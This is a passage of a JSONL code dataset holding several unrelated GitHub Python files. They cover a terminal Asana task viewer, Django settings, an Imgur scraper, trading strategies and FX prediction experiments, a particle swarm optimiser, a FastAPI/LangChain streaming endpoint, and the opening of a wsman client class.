CustomFields(task).component(),\n urwid.Divider('⎼'),\n urwid.Text(task.description()),\n urwid.Divider('⎼'),\n ]\n\n if task.subtasks():\n body.append(urwid.Pile([\n TaskRow(t, on_subtask_click) for t in task.subtasks()\n ]))\n\n stories = list(stories)\n if (len(stories) > 0):\n body = body + [\n urwid.Divider('-'),\n Stories(stories).component()\n ]\n\n self.details = urwid.ListBox(urwid.SimpleFocusListWalker(body))\n\n def component(self):\n return self.details\n\nclass Assignee(object):\n def __init__(self, task, on_click):\n if task.assignee():\n assignee = task.assignee().name()\n else:\n assignee = \"unassigned\"\n\n\n self.assignee = urwid.SelectableIcon([('strong', 'Assignee: '), ('', assignee)])\n\n self.on_click = on_click\n #urwid.connect_signal(self.assignee, 'keypress', self.on_keypress)\n\n def component(self):\n return self.assignee\n\n def on_keypress(self, size, key):\n if key == \"enter\":\n self.on_click()\n else:\n return key\n\nclass DueDate(object):\n def __init__(self, task, on_click):\n due_date = task.due_date()\n self.due_date = urwid.SelectableIcon([('strong', 'Due: '), ('', str(task.due_date()))])\n\n self.on_click = on_click\n #urwid.connect_signal(self.due_date, 'keypress', self.on_keypress)\n\n def component(self):\n return self.due_date\n\n def on_keypress(self, size, key):\n if key == \"enter\":\n self.on_click()\n else:\n return key\n\nclass Memberships(object):\n def __init__(self, task, on_subtask_click, on_project_click):\n self.on_project_click = on_project_click\n\n components = [self.membership(p.name(), p.id()) for p in task.projects()]\n\n if task.parent():\n components.append(urwid.Button(\n ('task', 'Subtask of: %s' % task.parent().name()),\n on_press = lambda x: on_subtask_click(task.parent().id())\n ))\n\n self.memberships = urwid.Pile(components)\n\n def membership(self, name, id):\n return urwid.Button(('project', name),\n on_press = lambda x: self.on_project_click(id)\n )\n\n def component(self):\n return self.memberships\n\nclass CustomFields(object):\n def __init__(self, task):\n components = [urwid.Text([\n ('custom_fields', f.name() + ': '),\n f.string_value()\n ]) for f in task.custom_fields()]\n\n self.custom_fields = urwid.Pile(components)\n\n def component(self):\n return self.custom_fields\n\nclass Stories(object):\n def __init__(self, stories):\n components = [\n urwid.Text([\n ('timestamp', s.created_at().strftime('%Y-%m-%d %H:%M')),\n ' ',\n ('author', s.creator()),\n ] + s.text())\n for s in stories]\n\n self.stories = urwid.Pile(components)\n\n def component(self):\n return self.stories\n","repo_name":"aarongut/cmdasana","sub_path":"ui/task_details.py","file_name":"task_details.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20561724285","text":"\"\"\"\nThis is an example local_settings.py, which stores custom settings,\ndifferent from project ones, provided for purpose of development.\n\nCreate a your own local settings in the `rush/local_settings.py`,\nwith the same content as here.\n\nThen, to run server with them, provide extra argument `--settings`, e.g.\n./manage.py runserver --settings=rush.local_settings\n\"\"\"\n\nfrom rush.settings import *\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n","repo_name":"pbajsarowicz/rush","sub_path":"rush/example_local_settings.py","file_name":"example_local_settings.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73426445354","text":"from datetime import datetime\nimport requests\n\ndef main():\n\tuser_name = str(input('Enter username: '))\n\tget_user_comments(user_name)\ndef get_user_comments(username):\n\tdict_list=[]\n\tfor i in range(100):\n\t\tr=requests.get(\"http://imgur.com/user/\"+username+\"/index/newest/page/\"\n\t\t +str(i)+\"/hit.json?scrolling\")\n\t\tpage_content=r.text\n\t\tif len(page_content) < 1:\n\t\t\tbreak\n\t\telse:\n\t\t\tcc=r.json()[\"data\"][\"captions\"][\"data\"]\n\t\t\tdict_list.append(cc)\n\t\t\tcontinue\n\textract_top_5(dict_list)\n\ndef extract_top_5(list_of_dict):\n\ttop_comments={}\n\tlist_of_top=[]\n\tfor i in list_of_dict:\n\t\tfor x in range(len(i)):\n\t\t\ti[x][\"datetime\"]=datetime.strptime(i[x][\"datetime\"],'%Y-%m-%d %H:%M:%S')\n\t\t\ttop_comments[i[x][\"points\"]] = [i[x][\"hash\"],i[x][\"title\"],i[x][\"datetime\"]]\n\n\tsorted_dict = {k : top_comments[k] for k in sorted(top_comments, reverse=True)}\n\tfirst5dict = {k: sorted_dict[k] for k in list(sorted_dict)[:5]}\n\n\tfor i in first5dict:\t\t\n\t\ttemp_dic={\"hash\":first5dict[i][0],\"Points\":i,\n\t\t \"Title\":first5dict[i][1],\"Date\":first5dict[i][2]}\n\n\t\tlist_of_top.append(temp_dic)\n\tcount=1;\n\tfor i in list_of_top:#matching format with one provided in the project example\n\t\tfor y in i:\n\t\t\tif y == 'hash':\n\t\t\t\tprint(str(count)+\".\",i[y])\n\t\t\t\tcount+=1\n\t\t\telse:\n\t\t\t\tprint(str(y)+\":\",i[y])\n\t\tprint()\n\t\t\n\treturn list_of_top\nif __name__ == '__main__':\n main()\t\n","repo_name":"Aziz-DU/Projects","sub_path":"COMP 3705 - Topics in Computer Science - Python/projects/project6/project06.py","file_name":"project06.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71144845672","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 30 17:12:11 2021\n\n@author: 조은지\n\"\"\"\nimport sys\ninput = sys.stdin.readline\n\nn, k = map(int, input().split())\n\nlaguage = [[0,0]]\ndp = [[0]*(k+1) for _ in range(n+1)]\n\nfor i in range(n):\n laguage.append(list(map(int, input().split())))\n\nfor i in range(1, n+1):\n for j in range(1, k+1):\n w = laguage[i][0]\n v = laguage[i][1]\n\n if j < w:\n dp[i][j] = dp[i-1][j]\n else:\n dp[i][j] = max(dp[i-1][j], dp[i-1][j-w]+v)\n\nprint(dp[n][k])\n ","repo_name":"eunjee/algorithmStudy","sub_path":"DP/12865.py","file_name":"12865.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38322150791","text":"# ---------------------------------- #\n# ------- DEFINE STRATEIGES -------- #\n# ---------------------------------- #\n\nfrom collections import deque\nimport backtrader as bt\nimport requests\n\n\n# enter psar, exit ema crossover (\n# entry vs. exit\n# 5min vs. 2min\n# 15min vs. 5min <-- use this one first\n# 1hr vs. 15min\nclass psarEma:\n params = dict(emaPeriod=21, psarRate=0.02)\n\n def __init__(self):\n emaPeriod = self.params[\"emaPeriod\"]\n\n self.ema1data = deque([], emaPeriod) # 5m\n self.ema2data = deque([], emaPeriod) # 15m\n\n r = requests.get(\n \"https://www.bitmex.com/api/v1/quote/bucketed?symbol=XBT&count=5&reverse=true&binSize=5m\"\n )\n resp = r.json()\n print(resp)\n\n for candle in reversed(resp):\n self.ema1data.appendleft(candle[\"close\"])\n\n rr = list(reversed(resp))\n for i in range(0, len(rr), 3):\n self.ema2data.appendleft(rr[i][\"close\"])\n\n # TODO: subscribe to redis for live updates, update queue\n # TODO: Send out trade\n # TODO: PSAR\n\n self.ema1 = bt.ind.EMA(self.data, period=self.p.emaPeriod)\n self.psar = bt.talib.SAR(\n self.data1.high, self.data1.low, acceleration=self.p.psarRate\n )\n self.crossover = bt.ind.CrossOver(self.ema1, self.data.close)\n self.cross2 = bt.ind.CrossOver(self.data1.close, self.psar)\n\n def next(self):\n if self.cross2[-1] == 1:\n if not self.position:\n self.buy()\n if self.cross2[-1] == -1:\n if not self.position:\n self.sell()\n\n if self.position:\n if self.position.size < 0: # short position\n if self.crossover[-1] == -1:\n self.close()\n if self.position.size > 0: # long position\n if self.crossover[-1] == 1:\n self.close()\n\n\n# psar entry, ema crossover exit\n# ignore this - unused\nclass psarX(bt.Strategy):\n params = dict(psarRate=0.02)\n\n def __init__(self):\n self.psar = bt.talib.SAR(\n self.data.high, self.data.low, acceleration=self.p.psarRate\n )\n self.cross = bt.ind.CrossOver(self.data.close, self.psar)\n\n def next(self):\n if not self.position:\n if self.cross == 1:\n self.buy()\n if self.cross == -1:\n self.sell()\n elif self.position:\n if self.cross == -1:\n self.close()\n self.sell()\n if self.cross == 1:\n self.close()\n self.buy()\n\n\n# adaptive moving average, mama and fama crossover\n# ignore that\nclass mesaX(bt.Strategy):\n params = dict(fastx=0.5, slowx=0.05)\n\n def __init__(self):\n self.mesa = bt.talib.MAMA((self.data.high + self.data.low) / 2)\n self.crossover = bt.ind.CrossOver(self.mesa.mama, self.mesa.fama)\n\n def next(self):\n if not self.position:\n if self.crossover == 1:\n self.buy()\n if self.crossover == -1:\n self.sell()\n elif self.position:\n if self.crossover == 1:\n self.close()\n self.buy()\n if self.crossover == -1:\n self.close()\n self.sell()\n\n\n# https://github.com/mementum/backtrader/pull/374/files\n# Supertrend indicator function taken from this link\nclass SuperTrendBand(bt.Indicator):\n \"\"\"\n Helper inidcator for Supertrend indicator\n \"\"\"\n\n params = ((\"period\", 7), (\"multiplier\", 3))\n lines = (\"basic_ub\", \"basic_lb\", \"final_ub\", \"final_lb\")\n\n def __init__(self):\n self.atr = bt.indicators.AverageTrueRange(period=self.p.period)\n self.l.basic_ub = ((self.data.high + self.data.low) / 2) + (\n self.atr * self.p.multiplier\n )\n self.l.basic_lb = ((self.data.high + self.data.low) / 2) - (\n self.atr * self.p.multiplier\n )\n\n def next(self):\n if len(self) - 1 == self.p.period:\n self.l.final_ub[0] = self.l.basic_ub[0]\n self.l.final_lb[0] = self.l.basic_lb[0]\n else:\n # =IF(OR(basic_ubfinal_ub*),basic_ub,final_ub*)\n if (\n self.l.basic_ub[0] < self.l.final_ub[-1]\n or self.data.close[-1] > self.l.final_ub[-1]\n ):\n self.l.final_ub[0] = self.l.basic_ub[0]\n else:\n self.l.final_ub[0] = self.l.final_ub[-1]\n\n # =IF(OR(baisc_lb > final_lb *, close * < final_lb *), basic_lb *, final_lb *)\n if (\n self.l.basic_lb[0] > self.l.final_lb[-1]\n or self.data.close[-1] < self.l.final_lb[-1]\n ):\n self.l.final_lb[0] = self.l.basic_lb[0]\n else:\n self.l.final_lb[0] = self.l.final_lb[-1]\n\n\nclass SuperTrend(bt.Indicator):\n \"\"\"\n Super Trend indicator\n \"\"\"\n\n params = ((\"period\", 1), (\"multiplier\", 1))\n lines = (\"super_trend\",)\n plotinfo = dict(subplot=False)\n\n def __init__(self):\n self.stb = SuperTrendBand(period=self.p.period, multiplier=self.p.multiplier)\n\n def next(self):\n if len(self) - 1 == self.p.period:\n self.l.super_trend[0] = self.stb.final_ub[0]\n return\n\n if self.l.super_trend[-1] == self.stb.final_ub[-1]:\n if self.data.close[0] <= self.stb.final_ub[0]:\n self.l.super_trend[0] = self.stb.final_ub[0]\n else:\n self.l.super_trend[0] = self.stb.final_lb[0]\n\n if self.l.super_trend[-1] == self.stb.final_lb[-1]:\n if self.data.close[0] >= self.stb.final_lb[0]:\n self.l.super_trend[0] = self.stb.final_lb[0]\n else:\n self.l.super_trend[0] = self.stb.final_ub[0]\n\n\n#\nclass candleTrade(bt.Strategy):\n def next(self):\n if self.data.close[-1] > self.data.open[-1]:\n if self.data.close[0] < self.data.open[0]:\n if self.position:\n self.close()\n self.sell()\n else:\n self.sell()\n else:\n if self.data.close[0] > self.data.open[0]:\n if self.position:\n self.close()\n self.buy()\n else:\n self.buy()\n\n\nclass candleShort(bt.Strategy):\n def next(self):\n if self.data.close[-1] > self.data.open[-1]:\n if self.data.close[0] < self.data.open[0]:\n if not self.position:\n self.sell()\n else:\n if self.data.close[0] > self.data.open[0]:\n if self.position:\n self.close()\n\n\nclass candleLong(bt.Strategy):\n def next(self):\n if self.data.close[-1] > self.data.open[-1]:\n if self.data.close[0] < self.data.open[0]:\n if self.position:\n self.close()\n else:\n if self.data.close[0] > self.data.open[0]:\n if not self.position:\n self.buy()\n\n\n# convert indicator to strategy\n# ignore\nclass superTrendX(bt.Strategy):\n def __init__(self):\n self.supertrend = SuperTrend(self.data)\n self.crossover = bt.ind.CrossOver(self.supertrend, self.data.close)\n\n def next(self):\n\n if self.crossover == -1:\n if self.position:\n self.close()\n self.buy()\n else:\n self.buy()\n if self.crossover == 1:\n if self.position:\n self.close()\n self.sell()\n else:\n self.sell()\n\n \"\"\"if not self.position:\n if self.crosshigh == -1:\n self.buy()\n if self.crosslow == 1:\n self.sell()\n elif self.position:\n if self.crosshigh == -1:\n self.close()\n self.buy()\n if self.crosslow == 1:\n self.close()\n self.sell()\"\"\"\n","repo_name":"strader07/trading-system","sub_path":"services/pyacm/strategies.py","file_name":"strategies.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"16676966370","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 9 10:48:44 2018\r\n\r\n@author: watsapon\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndf = pd.read_csv('USDJPY240_1.csv')\r\ndf = df[31286:]\r\ndf = df.reset_index()\r\ndf['change'] = abs(df.close - df.open)\r\ndf['volume'] = df['volume']/100\r\ndf['move'] = df.high - df.low\r\ndf['percent_needle'] = (abs(df.change)/df.move)*100\r\n#df = df.dropna()\r\ndf['needle'] = df.move - abs(df.change)\r\n\r\nneedle_point = [1 if x > 0.125 else 0 for x in df['move'].tolist()]\r\npercent = df['percent_needle'].tolist()\r\n\r\nfor i in range(len(percent)):\r\n if percent[i] < 25 and needle_point[i] == 1 :\r\n needle_point[i] = 1\r\n else:\r\n needle_point[i] = 0\r\n\r\ndf['chk_move'] = needle_point\r\n\r\n\r\n\r\ndf2 = df[['time','volume']]\r\ndf2 = df2.sort_values(['time'])\r\n#df2 = df2.groupby(['time'])['volume'].mean()\r\n\r\n\r\nplt.scatter(df2['time'], df2['volume']) # plot graph\r\nplt.xlabel('TIME') # label X\r\nplt.ylabel('VOLUME') # label Y\r\nplt.show() # show graph\r\n\r\n#print(df2['time'].value_counts())\r\n\r\ndf2 = df2.groupby(['time'])['volume'].mean()\r\ndf2 = df2.reset_index()\r\n\r\nx = np.arange(len(df2['time']))\r\nplt.bar(x, height= df2['volume'])\r\nplt.xticks(x, df2['time']);\r\nplt.xlabel('TIME') # label X\r\nplt.ylabel('VOLUME') # label Y\r\nplt.show()\r\n\r\n\r\n\r\ndf3 = df.groupby(['time'])['change'].mean()\r\ndf3 = df3.reset_index()\r\n\r\nx = np.arange(len(df3['time']))\r\nplt.bar(x, height= df3['change'])\r\nplt.xticks(x, df3['time'])\r\nplt.xlabel('TIME') # label X\r\nplt.ylabel('MOVE_VALUE') # label Y\r\nplt.show()\r\n\r\n\r\n\r\ndf4 = df.loc[df['chk_move'] == 1]\r\nindexd_df4 = df4.index.values\r\nindexd_df4 = [x+1 for x in indexd_df4 ]\r\n#print(indexd_df4)\r\ndf5 = df.iloc[indexd_df4]\r\n#\r\nprint(df5.change.mean())\r\n\r\n#df5 = df4.loc[df4['change'] >= 0.100]\r\n\r\n\r\n\r\n","repo_name":"Slyzingbergi/Automated-trading-forex-with-AI","sub_path":"exploration/Data_Exploration.py","file_name":"Data_Exploration.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"18428366191","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2021/8/16 9:24\n# @Author : doFighter\nimport numpy as np\n\n\ndef chaos(m, n, S):\n \"\"\"\n 混沌时间序列随机数生成器\n :param m: 行数指标\n :param n: 列数指标\n :param S: 混沌时间序列\n :return: 返回生成的随机数组\n \"\"\"\n index = np.ceil(np.random.rand(m, n) * 99).astype(int)\n res = S[index]\n return res\n\n\ndef TDPSO(N, dim, x_min, x_max, iterate_max, fitness):\n \"\"\"\n 完全受扰粒子群优化算法\n :param N: 种群数目\n :param dim: 问题维度\n :param x_min: 解空间下限\n :param x_max: 解空间上限\n :param iterate_max: 最大迭代次数\n :param fitness: 适应度值\n :return: 最优适应值\n \"\"\"\n # 第一步,生成混沌时间序列\n a = 1.4\n b = 0.3\n x = np.zeros(100)\n S = np.zeros(100)\n x[0] = 0\n S[0] = 0\n for i in range(1, 100):\n x[i] = S[i - 1] + 1 - a * x[i - 1] ** 2\n S[i] = b * x[i - 1]\n # 对混沌时间序列进行归一化操作\n S = S - min(S)\n S = S / max(S)\n\n c = [2.8, 1.3]\n x = x_min + (x_max - x_min) * chaos(N, dim, S)\n v_rand = np.random.rand(N, dim)\n v = (x_min - chaos(N, dim, S)) / (x_max - chaos(N, dim, S))\n v[v_rand >= 0.5] = abs(v[v_rand >= 0.5])\n pBest = x\n # 获取初始时全局最优位置\n gBest = pBest[0, :]\n for i in range(1, N):\n if fitness(gBest) > fitness(pBest[i, :]):\n gBest = pBest[i, :]\n iterate = 0\n pBest_res = np.ones([N])\n while iterate < iterate_max:\n omega = np.power(0.5, iterate + 1) + 0.4\n v = omega * v + c[0] * np.random.rand(N, dim) * (\n pBest - x) + c[1] * np.random.rand(N, dim) * (gBest - x)\n x += v\n x[x > x_max] = x_max\n x[x < x_min] = x_min\n if iterate > iterate_max * 0.7:\n v_max = np.max(v, 0)\n # 在python中会出现数字太小,而导致除法运算的警告,因此在本算法中,对绝对值过小的数统一赋值\n v_max[(v_max > 0) & (v_max < np.exp(-60))] = np.exp(-60)\n v_max[(v_max < 0) & (v_max > -np.exp(-60))] = -np.exp(-60)\n # v_max[abs(v_max) < np.exp(-30)] = np.exp(-30)\n RVC = v / v_max\n MAX_RVC = (np.max(RVC.T, 0)).T\n position = np.array(np.where(MAX_RVC <= 0.5))[0]\n cap = np.size(position)\n for i in range(cap):\n d = np.random.choice(30, int(dim * 0.5), replace=False)\n for j in range(int(dim * 0.5)):\n flag = np.random.rand()\n if flag > 0.5:\n x[position[i], d[j]] = chaos(\n 1, 1, S)[0] + x[position[i], d[j]]\n else:\n x[position[i], d[j]] = chaos(\n 1, 1, S)[0] - x[position[i], d[j]]\n # 更新各粒子的历史最优位置\n for i in range(N):\n if fitness(pBest[i, :]) > fitness(x[i, :]):\n pBest[i, :] = x[i, :]\n pBest_res[i] = fitness(pBest[i, :])\n # 更新全局最优位置\n if pBest_res.min() < fitness(gBest):\n index = np.where(pBest_res == pBest_res.min())\n gBest = pBest[index[0][0], :]\n iterate += 1\n result = fitness(gBest)\n return result\n\n\ndef Sphere(xx):\n \"\"\"\n Sphere Function\n :param xx: 疑似最优解\n :return:适应度值\n \"\"\"\n d = len(xx)\n sum = 0\n for i in range(d):\n sum += xx[i] ** 2\n return sum\n\n\n# 函数测试\nfor i in range(10):\n result = TDPSO(20, 30, -10, 10, 1000, Sphere)\n print(result)\n","repo_name":"doFighter/Computational-intelligence","sub_path":"粒子群优化算法/完全受扰粒子群优化/code/python/TDPSO.py","file_name":"TDPSO.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"75"} +{"seq_id":"36390324715","text":"\"\"\"create table Status\n\nRevision ID: f550e61d7543\nRevises: b09e09bbf433\nCreate Date: 2023-02-05 15:37:51.716238\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f550e61d7543'\ndown_revision = 'b09e09bbf433'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, 'services_list', ['id'])\n op.create_unique_constraint(None, 'services_status_list', ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'services_status_list', type_='unique')\n op.drop_constraint(None, 'services_list', type_='unique')\n # ### end Alembic commands ###\n","repo_name":"sumrak10/ServicesLog","sub_path":"ServicesLog/migrations/versions/f550e61d7543_create_table_status.py","file_name":"f550e61d7543_create_table_status.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18892235090","text":"import asyncio\nfrom typing import AsyncIterable\n\nfrom dotenv import load_dotenv\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import StreamingResponse\nfrom langchain.callbacks import AsyncIteratorCallbackHandler\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import HumanMessage\nfrom pydantic import BaseModel\n\nload_dotenv()\n\napp = FastAPI()\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\nclass Message(BaseModel):\n content: str\n\n\nasync def send_message(content: str) -> AsyncIterable[str]:\n callback = AsyncIteratorCallbackHandler()\n model = ChatOpenAI(\n streaming=True,\n verbose=True,\n callbacks=[callback],\n )\n\n task = asyncio.create_task(\n model.agenerate(messages=[[HumanMessage(content=content)]])\n )\n\n try:\n async for token in callback.aiter():\n yield token\n except Exception as e:\n print(f\"Caught exception: {e}\")\n finally:\n callback.done.set()\n\n await task\n\n\n@app.post(\"/stream_chat/\")\nasync def stream_chat(message: Message):\n generator = send_message(message.content)\n return StreamingResponse(generator, media_type=\"text/event-stream\")\n","repo_name":"Coding-Crashkurse/LangChain-FastAPI-Streaming","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"75"} +{"seq_id":"9763168647","text":"import site\nimport numpy as np\nimport os\nimport pandas as pd\n_path = os.path.dirname(os.path.abspath(__name__))\nsite.addsitedir(_path)\nimport datastore.sources as ds\n\nYTYPE = 'linear'\n# YTYPE = 'sign'\nndays_pred = 40 # working days in the future, 20 is a month?\n# CCYCCY = 'GBPUSD'\n# CCYCCY = 'CADUSD'\n# CCYCCY = 'CHFUSD'\nCCYCCY = 'CNYUSD' # interesting\nn_features = 12 \nn_history = 1\n\ndef _get_data():\n df = ds.quandl.CURRFX.get_all_cleaned()\n return df\n\ndef _get_shift_features(X):\n X = X.copy()\n # create shifts as clumsy way of getting last few days as features\n temp = list()\n for i in range(n_history):\n a = X.shift(i).copy()\n a.columns = [(*x, i) for x in a.columns]\n temp.append(a)\n temp = pd.concat(temp, axis=1)\n temp.columns = pd.MultiIndex.from_tuples(temp.columns)\n temp.columns.names = ['type', 'ccyccy', 'shift']\n temp = temp.sort_index(axis=1)\n return temp\n\ndef _get_date_features_from_index(X):\n X['day'] = X.index.day\n X['weekday'] = X.index.weekday\n return X\n\ntry:\n df\nexcept NameError as e:\n df = _get_data()\n\ndf = df.sort_index()\n# TODO add more features\ntemp = [df]\nfor i in [1, 2, 3, 4, 5, 10, 15, 20, 30, 40, 50, 60, 120]:\n df_diff = df.diff(periods=i)\n df_diff.columns = [(x[0] + ' diff {}'.format(i), x[1]) for x in df_diff.columns]\n temp.append(df_diff)\ndf_allfeatures = pd.concat(temp, axis=1)\n\n# i.e. [('High (est)', 'GBPUSD'), ('Low (est)', 'GBPUSD'), ('Rate', 'GBPUSD')]\npredcols = [x for x in df_allfeatures.columns if x[1] == CCYCCY]\npredcols_renamed = [(x[0] + ' pred', x[1]) for x in predcols]\n# confusing but keep the original, unshifted cols there\ndf_allfeatures[predcols_renamed] = df_allfeatures[predcols].shift(ndays_pred).copy()\ndf_allfeatures = df_allfeatures.dropna(subset=predcols_renamed)\n# y = df_allfeatures[predcols].iloc[:,0] # TODO, need to do these separately\ny_colname = ('Rate diff {} pred'.format(ndays_pred), CCYCCY)\ny = df_allfeatures[y_colname] # DO NOT FORGET ' pred' suffix !!!!\nif YTYPE == 'sign':\n y = y > 0\nX_raw = df_allfeatures.copy()\n# X_raw = X_raw.drop(predcols_renamed, axis=1)\nX_raw = X_raw[predcols]\nX = _get_shift_features(X_raw)\nX = _get_date_features_from_index(X)\n\n# xgboost not like MultiIndex cols\nX.columns = ['_'.join(map(str, x)) for x in X.columns]\n\nfrom sklearn.cross_validation import train_test_split\n# no do future vs past\n# y_train, X_train, y_test, X_test = train_test_split(y, X, test_size=0.3)\nn_test = round(X.shape[0] * 0.3)\nind = np.arange(X.shape[0])\ny_train, X_train, y_test, X_test, ind_train, ind_test = y.iloc[:-n_test], X.iloc[:-n_test], y.iloc[-n_test:], X.iloc[-n_test:], ind[:-n_test], ind[-n_test:]\n\nX_fit, X_eval, y_fit, y_eval, ind_fit, ind_eval = train_test_split(X_train, y_train, ind_train, test_size=0.3)\n\nprint('shapes', y.shape, X.shape, y_train.shape, X_train.shape, y_test.shape, X_test.shape)\n\n# feature importance/selection\nimport sklearn.ensemble as se\nif YTYPE == 'linear':\n etr = se.ExtraTreesRegressor(bootstrap=True, criterion='mse', max_depth=3,\n max_features='auto', max_leaf_nodes=None, min_samples_leaf=5, min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=100, n_jobs=1, oob_score=True, random_state=None, verbose=0, warm_start=False)\n etr.fit(X_fit.fillna(method='ffill').fillna(0), y_fit)\nelif YTYPE == 'sign':\n etr = se.ExtraTreesClassifier(bootstrap=True, class_weight=None, criterion='gini', max_depth=3,\n max_features='auto', max_leaf_nodes=None, min_samples_leaf=1, min_samples_split=2,\n min_weight_fraction_leaf=0.0, n_estimators=100, n_jobs=-1, oob_score=True, random_state=None,\n verbose=1, warm_start=False)\n etr.fit(X_fit.fillna(method='ffill').fillna(0), y_fit)\n\ns = pd.Series(etr.feature_importances_, index=X_fit.columns)\ns.sort(ascending=True)\n\ndef doplotA(y, y_pred):\n plot(y, y, 'k--', alpha=0.5)\n plot(y[ind_fit], y_pred[ind_fit], 'b.', alpha=0.5)\n plot(y[ind_eval], y_pred[ind_eval], 'g.', alpha=0.5)\n plot(y[ind_test], y_pred[ind_test], 'r.', alpha=0.5)\n\nfrom pylab import *\nion()\nfigure(3)\nclf()\nax = subplot(122)\ns.head(n=20).plot(ax=ax, kind='barh')\nfigure(4)\nclf()\nif YTYPE == 'linear':\n y_pred = etr.predict(X.fillna(method='ffill').fillna(0)) # TODO handle nan\n doplotA(y, y_pred)\n title('Extra Trees Pred for feature selection')\n\n# # really need to get this in a proper pipeline\n# i_features = np.argsort(etr.feature_importances_) < n_features\n# reduce_features = lambda x: x.iloc[:,i_features]\n# X_fit = reduce_features(X_fit)\n# X_test = reduce_features(X_test)\n# X_train = reduce_features(X_train)\n# X_eval = reduce_features(X_eval)\n# X = reduce_features(X)\n# \n# import xgboost as xgb\n# if YTYPE == 'linear':\n# model = xgb.XGBRegressor(base_score=0.5, colsample_bylevel=1, colsample_bytree=0.5, gamma=0, learning_rate=0.1,\n# max_delta_step=0, max_depth=3, min_child_weight=1, missing=None, n_estimators=100, nthread=-1,\n# objective='reg:linear', reg_alpha=0, reg_lambda=1, seed=2, silent=True, subsample=0.3)\n# model.fit(X_fit, y_fit, eval_set=[(X_fit, y_fit), (X_eval, y_eval), (X_test, y_test)])\n# elif YTYPE == 'sign':\n# model = xgb.XGBClassifier(base_score=0.5, colsample_bylevel=1, colsample_bytree=0.5, gamma=0, learning_rate=0.01,\n# max_delta_step=0, max_depth=3, min_child_weight=1, missing=None, n_estimators=1000, nthread=-1,\n# reg_alpha=0, reg_lambda=1, scale_pos_weight=1, seed=0, silent=True, subsample=1)\n# model.fit(X_fit, y_fit, eval_set=[(X_fit, y_fit), (X_eval, y_eval), (X_test, y_test)], eval_metric='auc')\n# \n# y_pred = model.predict(X)\n# \n# figure(1)\n# clf()\n# if YTYPE == 'linear':\n# doplotA(y, y_pred)\n# title('y vs y_pred {} (ndays = {})'.format(y_colname, ndays_pred))\n# \n# df_allfeatures['y_pred'] = y_pred\n# df_allfeatures['y'] = y\n# figure(2)\n# clf()\n# if YTYPE == 'linear':\n# ax = subplot(111)\n# df_allfeatures.iloc[ind_test][['y', 'y_pred']].plot(ax=ax)\n# title('y vs y_pred on test set\\n{} (ndays = {})'.format(y_colname, ndays_pred))\n# \n# \n# \n","repo_name":"cottrell/notebooks","sub_path":"fx/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"9670067743","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom . import wsmanData\nimport uuid\nimport requests\nfrom . import WryDict\nfrom time import sleep\n\n\nclass wsmanResource(object):\n '''\n Class to represent a resource on a wsman compatible server\n '''\n\n def __init__(self, target = None, is_ssl = False, username = None, password = None, resource = None, debug = False, showxml = False):\n '''\n Set up this resource\n\n @param target: the hostname or IP address of the wsman service\n @param is_ssl: should we communicate using SSL?\n @param resource: the identifier of the resource containing the settings we are interested in\n @param username: the username to log in with\n @param password: the password to log in with\n @param debug: enable debugging output\n @param showxml: enable output of XML transactions\n '''\n if is_ssl:\n scheme = 'https'\n else:\n scheme = 'http'\n port = wsmanData.AMT_PROTOCOL_PORT_MAP[scheme]\n self.target = scheme + \"://\" + target + \":\" + str(port) + \"/wsman\"\n self.resourceId = resource\n self.resourceUri = wsmanData.RESOURCE_URIS[self.resourceId]\n self.resource_methods = wsmanData.RESOURCE_METHODS[resource]\n self.username = username\n self.password = password\n self.debug = 